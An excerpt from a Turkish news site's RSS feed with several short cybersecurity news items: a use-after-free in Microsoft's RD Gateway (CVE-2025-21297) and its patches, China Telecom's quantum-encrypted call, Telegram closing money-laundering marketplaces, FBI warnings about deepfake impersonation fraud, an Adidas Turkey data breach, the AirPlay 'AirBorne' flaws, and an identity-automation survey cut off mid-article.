<content:encoded><![CDATA[<p data-start="543" data-end="1015" class=""><strong data-start="564" data-end="615">Microsoft’un RD Gateway bileşeninde kritik açık</strong><br data-start="615" data-end="618">Microsoft’un uzak masaüstü erişim servisi olan Remote Desktop Gateway (RD Gateway), yeni keşfedilen CVE-2025-21297 kodlu güvenlik açığı nedeniyle ciddi bir tehdit altında. Güvenlik araştırmacıları tarafından tespit edilen bu açıklık, saldırganların sunucu başlatma sürecinde yaşanan bir yarış durumu (race condition) üzerinden sistem belleğini bozarak kötü amaçlı kod çalıştırmasına imkân veriyor.</p>
<p data-start="1017" data-end="1576" class=""><strong data-start="1017" data-end="1055">Teknik detaylar ve saldırı vektörü</strong><br data-start="1055" data-end="1058">Söz konusu açık, aaedge.dll bileşeninde yer alan <code data-start="1107" data-end="1148">CTsgMsgServer::GetCTsgMsgServerInstance</code> fonksiyonunda tespit edilen bir <em data-start="1181" data-end="1197">use-after-free</em> (UAF) hatasından kaynaklanıyor. RD Gateway başlatılırken birden fazla iş parçacığının (thread) eşzamanlı olarak bu fonksiyona erişmesi, senkronizasyon eksikliği nedeniyle <code data-start="1369" data-end="1388">m_pMsgSvrInstance</code> işaretçisinin hatalı biçimde yeniden yazılmasına yol açıyor. Bu durum bellek bozulmasına neden olurken, saldırganların bu süreci manipüle ederek uzaktan kod çalıştırmasını mümkün kılıyor.</p>
<p data-start="1578" data-end="2030" class=""><strong data-start="163" data-end="230">Ebubekir Bastama: 'Sunucu kontrolü saldırganın eline geçebilir'</strong><br data-start="230" data-end="233">Siber güvenlik araştırmacısı Ebubekir Bastama, söz konusu güvenlik açığının ciddiyetine dikkat çekerek şu ifadeleri kullandı:<br data-start="358" data-end="361">'Bu tür zafiyetlere hızlı müdahale edilmezse, özellikle büyük sistemlerde yıkıcı etkileri olabilir. CVE-2025-21297 gibi bir açık, istismar edildiğinde saldırgana RD Gateway sunucusu üzerinde tam yetki kazandırabilir. Kurumsal sistemler için ciddi bir tehlike söz konusu.</p>
<p data-start="2032" data-end="2394" class=""><strong data-start="2032" data-end="2072">Riskin boyutu ve etkilenen sistemler</strong><br data-start="2072" data-end="2075">Güvenlik açığı, CVSS puanı 8.1 ile 'yüksek' risk kategorisine alınmış durumda. Açığın istismarı, 9 adımlı heap çarpışmaları içeren karmaşık bir süreci gerektirse de, saldırının başarıya ulaşması durumunda RD Gateway sunucularının tüm kontrolü ele geçirilebiliyor. Açık, aşağıdaki Windows Server sürümlerini etkiliyor:</p>
<ul data-start="2395" data-end="2524">
<li data-start="2395" data-end="2418" class="">
<p data-start="2397" data-end="2418" class="">Windows Server 2016</p>
</li>
<li data-start="2419" data-end="2442" class="">
<p data-start="2421" data-end="2442" class="">Windows Server 2019</p>
</li>
<li data-start="2443" data-end="2466" class="">
<p data-start="2445" data-end="2466" class="">Windows Server 2022</p>
</li>
<li data-start="2467" data-end="2524" class="">
<p data-start="2469" data-end="2524" class="">Windows Server 2025<br data-start="2488" data-end="2491">(Core ve Standard yapıları dahil)</p>
</li>
</ul>
<p data-start="2526" data-end="2837" class=""><strong data-start="2526" data-end="2559">Kurumsal ağlar tehdit altında</strong><br data-start="2559" data-end="2562">RD Gateway, kurumsal ağlara güvenli uzak erişim sağlamak amacıyla kullanıldığından, bu zafiyet kritik öneme sahip. Açığın kötüye kullanılması durumunda, kurum ağına yetkisiz erişim sağlanabilir ve veri sızıntısı ya da sistem çökmesi gibi ciddi güvenlik ihlalleri yaşanabilir.</p>
<p data-start="2839" data-end="3055" class=""><strong data-start="2839" data-end="2880">Microsoft’tan güvenlik güncellemeleri</strong><br data-start="2880" data-end="2883">Microsoft, söz konusu güvenlik açığını gidermek üzere Mayıs 2025 itibarıyla çeşitli güvenlik güncellemeleri yayınladı. Etkilenen sistemler için ilgili yama kodları şöyle:</p>
<ul data-start="3056" data-end="3199">
<li data-start="3056" data-end="3091" class="">
<p data-start="3058" data-end="3091" class="">Windows Server 2016 → KB5050011</p>
</li>
<li data-start="3092" data-end="3127" class="">
<p data-start="3094" data-end="3127" class="">Windows Server 2019 → KB5050008</p>
</li>
<li data-start="3128" data-end="3163" class="">
<p data-start="3130" data-end="3163" class="">Windows Server 2022 → KB5049983</p>
</li>
<li data-start="3164" data-end="3199" class="">
<p data-start="3166" data-end="3199" class="">Windows Server 2025 → KB5050009</p>
</li>
</ul>
<p data-start="3201" data-end="3509" class=""><strong data-start="3201" data-end="3233">Kurumlara acil eylem çağrısı</strong><br data-start="3233" data-end="3236">Uzmanlar, kullanıcıların acilen ilgili yamaları uygulamasını ve RD Gateway sistemlerini sadece güvenilir IP adreslerine erişime açmasını tavsiye ediyor. Ayrıca, RD Gateway loglarının olağandışı aktiviteler açısından düzenli olarak gözden geçirilmesi gerektiği belirtiliyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Çin&amp;apos;den siber güvenlikte tarihi adım: Kuantum şifreli ilk telefon görüşmesi başarıyla yapıldı</title>
<link>https://www.ajansexpres.com.tr/cinden-siber-guvenlikte-tarihi-adim-kuantum-sifreli-ilk-telefon-goerusmesi-basariyla-yapildi</link>
<guid>https://www.ajansexpres.com.tr/cinden-siber-guvenlikte-tarihi-adim-kuantum-sifreli-ilk-telefon-goerusmesi-basariyla-yapildi</guid>
<description><![CDATA[ China Telecom Quantum Group, kuantum anahtar dağıtımı ve kuantum sonrası kriptografiyi birleştiren dünyanın ilk ticari kuantum kriptografi sistemini faaliyete geçirdi. Pekin ile Hefei arasında kuantum şifreli ilk telefon görüşmesi yapıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484a18fe80.webp" length="31238" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:49:05 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Kuantum kriptografi sistemi nasıl çalışıyor, Çin ilk kuantum şifreli görüşmeyi nerede yaptı, QKD ve PQC nedir, China Telecom hangi yeni kuantum ürünlerini tanıttı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="389" data-end="392"><strong data-start="392" data-end="465">Çin, kuantum kriptografi alanında yeni bir dönemin kapılarını araladı</strong><br data-start="465" data-end="468">Çin merkezli devlet şirketi China Telecom Quantum Group, dünyanın ilk ticari kuantum kriptografi sistemini kullanıma sundu. Şirket, bu sistemle Pekin ve Hefei şehirleri arasında 1.000 kilometreden uzun bir mesafede kuantum şifreli ilk bölgeler arası telefon görüşmesini başarıyla gerçekleştirdi.</p>
<p></p>
<p data-start="767" data-end="1115"><strong data-start="767" data-end="827">Kuantum teknolojilerinin siber güvenlikteki rolü artıyor</strong><br data-start="827" data-end="830">Kuantum bilişimdeki hızlı ilerleme, klasik şifreleme sistemlerinin güvenliğini tehdit ediyor. Yeni geliştirilen kuantum kriptografi sistemi, özellikle güçlü kuantum bilgisayarların ileride oluşturabileceği şifre kırma tehditlerine karşı veri güvenliğini sağlamak amacıyla tasarlandı.</p>
<p data-start="1117" data-end="1544"><strong data-start="1117" data-end="1167">QKD ve PQC teknolojileri tek sistemde birleşti</strong><br data-start="1167" data-end="1170">Yeni sistem, Kuantum Anahtar Dağıtımı (QKD) ve Kuantum Sonrası Kriptografi (PQC) teknolojilerini bir araya getirerek siber güvenlikte çığır açıyor. QKD, şifreleme anahtarlarını fiziksel kuantum prensiplerine dayalı olarak güvenli biçimde iletirken; PQC, geleneksel algoritmaların kuantum bilgisayarlarca kırılmasını önlemek için gelişmiş matematiksel yöntemler kullanıyor.</p>
<p data-start="1546" data-end="1988"><strong data-start="1546" data-end="1604">China Telecom’dan iki yeni kuantum güvenlik ürünü daha</strong><br data-start="1604" data-end="1607">China Telecom, kuantum şifreli telefon sistemine ek olarak iki yeni ürün tanıttı. Bunlardan ilki, kuantum güvenli taşıyıcı sınıfı anlık mesajlaşma platformu olan <em data-start="1769" data-end="1785">Quantum Secret</em>; diğeri ise finansal denetim ve iş akış yönetimi için geliştirilen <em data-start="1853" data-end="1873">Quantum Cloud Seal</em> platformu oldu. Her iki ürün de Çin’in kuantum teknolojileri konusundaki stratejik kararlılığını ortaya koyuyor.</p>
<p data-start="1990" data-end="2171"><strong data-start="1990" data-end="2002"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Telegram, Çin merkezli 35 milyar dolarlık kara para ağına darbe vurdu</title>
<link>https://www.ajansexpres.com.tr/telegram-cin-merkezli-35-milyar-dolarlik-kara-para-agina-darbe-vurdu</link>
<guid>https://www.ajansexpres.com.tr/telegram-cin-merkezli-35-milyar-dolarlik-kara-para-agina-darbe-vurdu</guid>
<description><![CDATA[ Telegram, 2021&#039;den bu yana faaliyet gösteren ve dünya genelinde siber suçlulara hizmet sunduğu belirtilen iki yasa dışı pazar yerini kapattı. Huione ve Xinbi Guarantee&#039;nin çökertilmesiyle birlikte, toplamda 35 milyar dolarlık kara para trafiği engellendi. ABD Hazine Bakanlığı&#039;nın da radarında olan şirketin Kuzey Kore bağlantılı işlemleri dikkat çekiyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894849d0c820.webp" length="18490" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:49:00 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Telegram hangi yasa dışı pazarları kapattı, Huione Group neden suçlanıyor, ABD Hazine Bakanlığı Huione ile ilgili hangi adımları attı, Telegram sözcüsü bu operasyonla ilgili ne dedi</media:keywords>
<content:encoded><![CDATA[<p><br data-start="477" data-end="480"><strong data-start="480" data-end="521">Telegram, yasa dışı pazarları kapattı</strong><br data-start="521" data-end="524">Popüler mesajlaşma uygulaması Telegram, çevrimiçi suçlarla mücadele kapsamında iki büyük yasa dışı platformu devre dışı bıraktı. Çin merkezli Xinbi Guarantee ve Huione Guarantee isimli bu pazar yerlerinin 2021’den bu yana faaliyet gösterdiği ve toplamda 35 milyar doları aşan bir işlem hacmine ulaştığı belirtildi.</p>
<p></p>
<p data-start="840" data-end="1182"><strong data-start="840" data-end="879">Siber suçlulara hizmet sunuyorlardı</strong><br data-start="879" data-end="882">Söz konusu platformların çalınan verilerin paylaşımı, kara para aklama hizmetleri ve telekomünikasyon altyapısı temini gibi yasa dışı faaliyetlerde kullanıldığı açıklandı. Blockchain analiz şirketi Elliptic’e göre bu operasyon, çevrimiçi dolandırıcılık faaliyetlerini önemli ölçüde sekteye uğratacak.</p>
<p data-start="1184" data-end="1588"><strong data-start="1184" data-end="1218">ABD, Huione Group'u hedef aldı</strong><br data-start="1218" data-end="1221">Huione Guarantee platformunun sahibi olan Huione Group, ABD Hazine Bakanlığı tarafından suç örgütlerine destek vermekle suçlandı. Şirketin, Kuzey Kore’nin siber soygunlarından 37 milyon dolar, dolandırıcılık olarak bilinen ‘domuz kesimi’ yönteminden ise 36 milyon doları akladığı öne sürüldü. Bu gelişmelerin ardından şirketin ABD finans sistemine erişimi engellendi.</p>
<p data-start="1590" data-end="1993"><strong data-start="1590" data-end="1623">Telegram sözcüsünden açıklama</strong><br data-start="1623" data-end="1626">Kapatılan hesaplar ve yasaklanan platformlar hakkında konuşan bir Telegram sözcüsü, Reuters’a yaptığı açıklamada ‘Dolandırıcılık veya kara para aklama gibi suç faaliyetlerinin hizmet şartları tarafından yasaklandığını ve keşfedildiğinde her zaman kaldırıldığını’ ifade etti. Telegram daha önce de binlerce kripto para dolandırıcılığı hesabını platformdan kaldırmıştı.</p>
<p data-start="1995" data-end="2195"><strong data-start="1995" data-end="2007"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>FBI&amp;apos;dan Deepfake ve Yapay Zeka Alarmı: Üst Düzey Yetkilileri Taklit Eden Yeni Dolandırıcılık Dalgası</title>
<link>https://www.ajansexpres.com.tr/fbidan-deepfake-ve-yapay-zeka-alarmi-ust-duzey-yetkilileri-taklit-eden-yeni-dolandiricilik-dalgasi</link>
<guid>https://www.ajansexpres.com.tr/fbidan-deepfake-ve-yapay-zeka-alarmi-ust-duzey-yetkilileri-taklit-eden-yeni-dolandiricilik-dalgasi</guid>
<description><![CDATA[ ABD Federal Soruşturma Bürosu (FBI), deepfake ve üretken yapay zeka teknolojileriyle üst düzey devlet yetkililerini taklit eden dolandırıcıların yeni kimlik avı saldırıları düzenlediğini belirterek vatandaşları uyardı. FBI, smishing ve vishing saldırılarında artış yaşandığını ve bu yöntemlerle hassas bilgilerin hedef alındığını vurguladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894849821fe8.webp" length="45190" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:56 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>FBI hangi teknolojilere karşı uyarıda bulundu, smishing ve vishing saldırıları nasıl yapılıyor, deepfake mesajlar nasıl ayırt edilir, dolandırıcıların asıl hedefi nedir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="485" data-end="488"><strong data-start="488" data-end="535">FBI, sahte yetkili mesajlarına karşı uyardı</strong><br data-start="535" data-end="538">Amerika Birleşik Devletleri Federal Soruşturma Bürosu (FBI), yeni yayımladığı bir kamu duyurusuyla vatandaşları devam eden bir kimlik avı kampanyasına karşı dikkatli olmaya çağırdı. Yapılan açıklamada, tehdit aktörlerinin üretken yapay zeka (GenAI) ve deepfake teknolojilerini kullanarak üst düzey ABD federal ve eyalet hükümet yetkililerini taklit ettiği belirtildi.</p>
<p></p>
<p data-start="909" data-end="1247"><strong data-start="909" data-end="952">Smishing ve vishing saldırıları artışta</strong><br data-start="952" data-end="955">Söz konusu saldırılarda, SMS (smishing) ve sesli arama (vishing) yoluyla kullanıcıların güvenini kazanarak hassas verileri ele geçirmeye çalışıldığı bildirildi. FBI, bu yöntemlerin özellikle insanların duygularını hedef alarak hızlı ve düşünmeden karar vermelerine neden olduğunu vurguladı.</p>
<p data-start="1249" data-end="1533"><strong data-start="1249" data-end="1283">Sesli mesajlar tehlike taşıyor</strong><br data-start="1283" data-end="1286">FBI, tehdit aktörlerinin özellikle güvenilir ses ve metin mesajları oluşturmak için yapay zeka ve deepfake teknolojilerinden faydalandığını, çoğu durumda mevcut ve eski üst düzey yetkililer veya onların bağlantılarının taklit edildiğini aktardı.</p>
<p data-start="1535" data-end="1887"><strong data-start="1535" data-end="1561">Güvenlik için öneriler</strong><br data-start="1561" data-end="1564">FBI açıklamasında, "Üst düzey bir ABD yetkilisinden geldiğini iddia eden bir mesaj alırsanız, bunun gerçek olduğunu varsaymayın." uyarısında bulundu. Ayrıca kimlik doğrulaması yapılmadan mesajlara itibar edilmemesi gerektiği, ses tonu ve kelime seçimlerindeki tutarsızlıkların dikkatle incelenmesi gerektiği ifade edildi.</p>
<p data-start="1889" data-end="2126"><strong data-start="1889" data-end="1911">Ünlüler de hedefte</strong><br data-start="1911" data-end="1914">Üretken yapay zeka ve deepfake teknolojilerinin yaygınlaşmasıyla birlikte dolandırıcılık olaylarının arttığına dikkat çekilirken, Elon Musk gibi kamuya mal olmuş kişilerin dahi sıkça taklit edildiği belirtildi.</p>
<p data-start="2128" data-end="2311"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Yapay zeka ile yapılan dolandırıcılıklarda yeni dönem: FBI&amp;apos;dan deepfake uyarısı</title>
<link>https://www.ajansexpres.com.tr/yapay-zeka-ile-yapilan-dolandiriciliklarda-yeni-doenem-fbidan-deepfake-uyarisi</link>
<guid>https://www.ajansexpres.com.tr/yapay-zeka-ile-yapilan-dolandiriciliklarda-yeni-doenem-fbidan-deepfake-uyarisi</guid>
<description><![CDATA[ FBI, üretken yapay zeka ve deepfake teknolojilerini kullanarak üst düzey devlet yetkililerini taklit eden dolandırıcılara karşı vatandaşları uyardı. Smishing ve vishing saldırılarıyla hassas veriler hedef alınıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948493246d1.webp" length="25980" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:51 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>FBI neden deepfake ve yapay zekaya karşı uyarıda bulundu, smishing ve vishing nedir, bu saldırılar kimleri hedef alıyor, vatandaşlar bu tehditlere karşı nasıl önlem almalı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="346" data-end="349"><strong data-start="349" data-end="421">FBI'dan ABD vatandaşlarına yapay zekâ tabanlı dolandırıcılık uyarısı</strong><br data-start="421" data-end="424">Amerika Birleşik Devletleri Federal Soruşturma Bürosu (FBI), yayınladığı yeni bir kamu duyurusunda, üretken yapay zeka (GenAI) ve deepfake teknolojileri kullanılarak gerçekleştirilen kimlik avı saldırılarına karşı vatandaşları dikkatli olmaya çağırdı.</p>
<p></p>
<p data-start="677" data-end="1044"><strong data-start="677" data-end="717">Üst düzey yetkililer taklit ediliyor</strong><br data-start="717" data-end="720">Duyuruda, siber suçluların hem federal hem de eyalet düzeyindeki mevcut ya da eski üst düzey hükümet yetkililerini veya onların yakın çevresini taklit ettiği belirtildi. Bu kişilerin adları ve görselleri, güvenilirlik hissi yaratmak amacıyla deepfake ve GenAI teknolojileriyle sahte sesli ve yazılı mesajlara dönüştürülüyor.</p>
<p data-start="1046" data-end="1413"><strong data-start="1046" data-end="1090">Smishing ve vishing saldırılarında artış</strong><br data-start="1090" data-end="1093">FBI, dolandırıcıların smishing (SMS ile kimlik avı) ve vishing (sesli kimlik avı) yöntemleriyle insanları hedef aldığına dikkat çekti. Bu tür saldırıların amacı, kullanıcıları ikincil bir mesajlaşma platformuna yönlendirerek kötü amaçlı yazılım bulaştırmak ya da değerli kişisel bilgileri ele geçirmek olarak tanımlandı.</p>
<p data-start="1415" data-end="1746"><strong data-start="1415" data-end="1450">Vatandaşlara güvenlik önerileri</strong><br data-start="1450" data-end="1453">FBI, dolandırıcılık girişimlerine karşı vatandaşlara çeşitli güvenlik önerilerinde bulundu. Bu kapsamda, özellikle üst düzey bir kişiden geldiği iddia edilen mesajların gerçekliğinin sorgulanması, sesli mesajların tonlama ve kelime seçimi açısından dikkatlice incelenmesi gerektiği vurgulandı.</p>
<p data-start="1748" data-end="2075"><strong data-start="1748" data-end="1775">Ünlü isimler de hedefte</strong><br data-start="1775" data-end="1778">Uyarıda, Elon Musk gibi kamuoyunda tanınan isimlerin de bu tür sahte içeriklerde sıkça kullanıldığı ifade edildi. Yapay zeka tabanlı teknolojilerin yaygınlaşması, dolandırıcıların ikna edici içerikler üretmesini kolaylaştırırken, kullanıcıların bu konuda daha bilinçli olması gerektiği belirtildi.</p>
<p data-start="2077" data-end="2265"><strong data-start="2077" data-end="2089"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Adidas Türkiye&amp;apos;deki Müşterilerinin Kişisel Verilerinin Çalındığını Açıkladı</title>
<link>https://www.ajansexpres.com.tr/adidas-turkiyedeki-musterilerinin-kisisel-verilerinin-calindigini-acikladi</link>
<guid>https://www.ajansexpres.com.tr/adidas-turkiyedeki-musterilerinin-kisisel-verilerinin-calindigini-acikladi</guid>
<description><![CDATA[ Adidas, Türkiye&#039;deki bazı müşterilerinin kişisel verilerinin çalındığını ve güvenlik ihlali yaşandığını açıkladı. Şirket, kredi kartı bilgileri gibi finansal verilerin güvende olduğunu belirtti ve kullanıcılarını potansiyel dolandırıcılıklara karşı uyardı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894848da581d.webp" length="34494" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:45 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Adidas&#039;ın Türkiye&#039;deki veri ihlali ne zaman meydana geldi, Adidas hangi verilerin sızdırıldığını açıkladı, Adidas müşterileri hangi konuda uyarıldı, Sızdırılan verilere dair başka hangi güvenlik önlemleri alındı?</media:keywords>
<content:encoded><![CDATA[<p><br data-start="372" data-end="375"><strong data-start="375" data-end="445">Adidas Türkiye'deki Müşterilerinin Verilerinin Çalındığını Duyurdu</strong><br data-start="445" data-end="448">Spor giyim markası Adidas, Türkiye'deki bazı müşterilerinin kişisel verilerinin sızdırıldığını açıkladı. Şirket, müşterilerine gönderdiği e-posta ile veri ihlali nedeniyle özür diledi ve kullanıcıları olası dolandırıcılıklara karşı uyardı.<br data-start="687" data-end="690"><strong data-start="690" data-end="719">Sızdırılan Veriler Neler?</strong><br data-start="719" data-end="722">Adidas'tan gelen açıklamaya göre, hackerlar, müşteri hizmetleriyle iletişime geçmiş bazı kullanıcıların kişisel bilgilerine erişim sağladı. Sızdırılan bilgiler arasında isim, e-posta adresi, telefon numarası, cinsiyet ve doğum tarihi bulunuyor. Ancak kredi kartı bilgileri ve kullanıcı şifrelerinin güvende olduğu bildirildi.<br data-start="1047" data-end="1050"><strong data-start="1050" data-end="1083">Adidas'tan Güvenlik Önlemleri</strong><br data-start="1083" data-end="1086">Adidas, veri ihlalinin ardından acil güvenlik önlemleri aldığını belirtti. Şirket, müşteri hesapları için parolaların sıfırlanması ve ek güvenlik önlemleri alındığını duyurdu. Ayrıca, kullanıcıları şüpheli mesajlara karşı dikkatli olmaları konusunda uyardı.<br data-start="1343" data-end="1346"><strong data-start="1346" data-end="1398">Müşterilere Uyarı: Şüpheli Mesajlara Dikkat Edin</strong><br data-start="1398" data-end="1401">Adidas, verilerin sızdırıldığına dair bir şüpheli faaliyet tespit edilmediğini ancak yine de kullanıcıların dikkatli olmaları gerektiğini vurguladı. Şirket, kullanıcıların hiçbir zaman kredi kartı bilgilerini veya şifrelerini paylaşmamaları gerektiğini hatırlattı.</p>
<p></p>
<p data-start="1667" data-end="1892" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Milyonlarca iPhone cihazı riskte: &amp;apos;AirPlay açığı hackerlara kapı aralıyor&amp;apos;</title>
<link>https://www.ajansexpres.com.tr/milyonlarca-iphone-cihazi-riskte-airplay-acigi-hackerlara-kapi-araliyor</link>
<guid>https://www.ajansexpres.com.tr/milyonlarca-iphone-cihazi-riskte-airplay-acigi-hackerlara-kapi-araliyor</guid>
<description><![CDATA[ Apple kullanıcılarını ilgilendiren kritik bir güvenlik açığı tespit edildi. AirPlay özelliğinde ortaya çıkan açık, hackerların aynı Wi-Fi ağına bağlı cihazlara uzaktan erişmesine ve casusluk yapmasına olanak tanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894848913101.webp" length="19832" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:40 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>AirPlay açığı nedir, hackerlar iPhone cihazlara nasıl sızıyor, CarPlay sistemleri de risk altında mı, kullanıcılar AirPlay&#039;i nasıl devre dışı bırakabilir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="347" data-end="350"><strong data-start="350" data-end="411">Apple cihazlarındaki AirPlay özelliği tehlike mi saçıyor?</strong><br data-start="411" data-end="414">Apple'ın cihazlar arası medya paylaşımını kolaylaştıran AirPlay protokolü, siber güvenlik uzmanlarının gündeminde. Oligo adlı güvenlik firması, bu sistemde kritik güvenlik açıkları tespit etti.</p>
<p></p>
<p data-start="611" data-end="949"><strong data-start="611" data-end="636">AirBorne açığı nedir?</strong><br data-start="636" data-end="639">Yapılan araştırmada, 'AirBorne' adı verilen bu açıkların hem Apple’ın AirPlay sisteminde hem de üçüncü taraf cihazların AirPlay uyumlu hale gelmesini sağlayan yazılım geliştirme kitinde (SDK) yer aldığı belirtildi. Söz konusu açıklar, hackerların aynı Wi-Fi ağına bağlı cihazlara uzaktan erişmesini sağlıyor.</p>
<p data-start="951" data-end="1235"><strong data-start="951" data-end="996">Test saldırısı: Hoparlöre erişim sağlandı</strong><br data-start="996" data-end="999">Oligo araştırmacıları, AirPlay destekli bir Bose hoparlöre uzaktan erişim sağlayarak sistemdeki açıklardan nasıl yararlanılabileceğini gösterdi. Uzak kod yürütme (RCE) saldırısı ile hoparlörün ekranına 'AirBorne' logosu yerleştirildi.</p>
<p data-start="1237" data-end="1535"><strong data-start="1237" data-end="1294">Mikrofonlu cihazlar casusluk tehdidiyle karşı karşıya</strong><br data-start="1294" data-end="1297">Güvenlik firması, bu açıkların özellikle mikrofon bulunan cihazlarda casusluk amacıyla kullanılabileceğini belirtti. Oligo'nun CTO’su Gal Elbaz, Wired'a yaptığı açıklamada milyonlarca cihazın bu açıklardan etkilenebileceğini ifade etti.</p>
<p data-start="1537" data-end="1864"><strong data-start="1537" data-end="1568">Apple ve CarPlay açıklaması</strong><br data-start="1568" data-end="1571">Apple ise yaptığı açıklamada, söz konusu güvenlik zafiyetlerinin etkisinin 'sınırlı' olduğunu savundu. Ancak araştırmacılar, benzer risklerin CarPlay destekli sistemlerde de bulunduğunu, özellikle tahmin edilebilir ya da bilinen Wi-Fi şifreleri kullanıldığında tehlikenin arttığını bildirdi.</p>
<p data-start="1866" data-end="2079"><strong data-start="1866" data-end="1918">Kullanıcılara öneri: Özelliği devre dışı bırakın</strong><br data-start="1918" data-end="1921">Uzmanlar, AirPlay özelliğini kullanmayan kullanıcıların güvenlik riski yaşamamak adına bu özelliği cihaz ayarlarından devre dışı bırakmasını tavsiye ediyor.</p>
<p data-start="2081" data-end="2253"><strong data-start="2081" data-end="2093"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Kimlik güvenliğinde otomasyon krizi: Her 10 şirketten 9&amp;apos;u hâlâ manuel yöntemlere güveniyor</title>
<link>https://www.ajansexpres.com.tr/kimlik-guvenliginde-otomasyon-krizi-her-10-sirketten-9u-hala-manuel-yoentemlere-guveniyor</link>
<guid>https://www.ajansexpres.com.tr/kimlik-guvenliginde-otomasyon-krizi-her-10-sirketten-9u-hala-manuel-yoentemlere-guveniyor</guid>
<description><![CDATA[ Cerby&#039;nin 500&#039;den fazla IT ve güvenlik yöneticisiyle gerçekleştirdiği araştırmaya göre, şirketlerin sadece %4&#039;ü kimlik yönetim süreçlerini tamamen otomatik hale getirebildi. MFA etkinleştirme, şifre güncelleme ve erişim iptali gibi kritik işlemler hâlâ büyük ölçüde insan hatasına dayalı yürütülüyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948483aefa3.webp" length="64038" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:48:35 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Kimlik güvenliğinde otomasyon eksikliği neden tehlikeli, şirketler MFA&#039;yı neden zorunlu hale getiremiyor, manuel erişim iptali ne gibi riskler yaratıyor, yapay zekâ otomasyonu nasıl destekleyebilir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="443" data-end="446"><strong data-start="446" data-end="523">Yeni araştırma kimlik güvenliğindeki otomasyon açığını gözler önüne serdi</strong><br data-start="523" data-end="526">Cerby tarafından yayımlanan ‘2025 Kimlik Otomasyonu Açığı’ başlıklı rapor, 500'den fazla IT ve güvenlik yöneticisinin katılımıyla oluşturuldu. Araştırma, şirketlerin kimlik güvenliği süreçlerinde hâlâ büyük oranda manuel işlemlere dayandığını ortaya koydu.</p>
<p></p>
<p data-start="784" data-end="1211"><strong data-start="784" data-end="828">Manuel süreçler güvenlik zaafı yaratıyor</strong><br data-start="828" data-end="831">Kurumlar, kimlik güvenliği konusunda kâğıt üzerinde yeterli görünse de gerçekler farklı. Çok faktörlü kimlik doğrulama (MFA) etkinleştirme, şifrelerin güvenli biçimde saklanması ve eski çalışanların sistemden çıkarılması gibi işlemlerin büyük bölümü hâlâ manuel olarak yürütülüyor. Cerby'nin araştırmasına göre, yalnızca %4’lük bir kesim bu süreçleri tamamen otomatikleştirebildi.</p>
<p data-start="1213" data-end="1678"><strong data-start="1213" data-end="1274">İnsan hatası en büyük risklerden biri olmaya devam ediyor</strong><br data-start="1274" data-end="1277">Verizon’un 2025 Veri İhlali Raporu'na göre, güvenlik ihlallerinin %60'ında insan faktörü yer aldı. Cerby’nin verileri de bu tabloyu destekliyor: Şirketlerin %41’i şifreleri hâlâ e-posta ve elektronik tablolar gibi güvenli olmayan yöntemlerle güncelliyor. %89’luk kesim ise MFA işlemlerini kullanıcıların manuel olarak devreye almasını bekliyor. Bu da saldırganlar için ciddi bir açık anlamına geliyor.</p>
<p data-start="1680" data-end="2080"><strong data-start="1680" data-end="1721">Erişim yönetimi hâlâ manuel ilerliyor</strong><br data-start="1721" data-end="1724">Şirketlerin %59’u, kullanıcı erişimlerinin başlatılması ve sonlandırılması işlemlerini manuel olarak sürdürüyor. Bu da biletleme sistemlerine ya da sözlü takiplere dayanarak ilerleyen yavaş, dağınık ve güvenlik açıklarına açık bir yapı oluşturuyor. Ponemon Enstitüsü'nün verilerine göre, şirketlerin %52’si manuel işlemler nedeniyle güvenlik ihlali yaşadı.</p>
